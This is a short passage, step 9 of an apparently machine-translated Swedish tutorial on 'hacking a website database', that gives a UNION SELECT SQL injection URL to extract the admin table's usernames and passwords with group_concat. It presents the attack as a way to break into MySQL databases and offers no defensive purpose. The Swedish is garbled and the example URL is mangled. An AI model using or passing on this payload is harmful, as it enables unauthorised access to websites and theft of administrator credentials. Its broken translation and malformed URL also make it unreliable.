Guide till Hacking webbplats databas 101 (9 / 10 steg)
Steg 9: Att hitta administratörens användarnamn och lösenord - del 2
När du har skrivit i * Username_Column *, 0x20616e6420, * Password_Column * mellan de group_concat parenteserna,
Vi måste nu lägga till tabellen värdnamnet .
Efter den befalla från , skriv i ditt Admin tabell namn att du fick i steg 5. (I mitt fall min Admin namn är nifty_admin)
Se till att du skriver Admin tabellnamnet i engelska,Inte Hexadecimaltecken.
Nu ut komplett webbadressen slutligen så här:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 unionen Välj 1, group_concat (* Username_Column *, 0x20616e6420, * Password_Column *), 3,4,5,6,7,8 från * Admin_Table_Name *
Göra säker du ersätta * Admin_Table_Name * med ditt Admin tabellnamn tillsammans med * Username_Column *, * Password_Column *
Om du trycker Enter, kommer du se användarnamn och lösenord som bilden ovan, Obs: Den Username & lösenord du ser ovan är OUTDATED, de fungerar inte.
Grattis! Du har framgångsrikt hackat in i MySQL databas!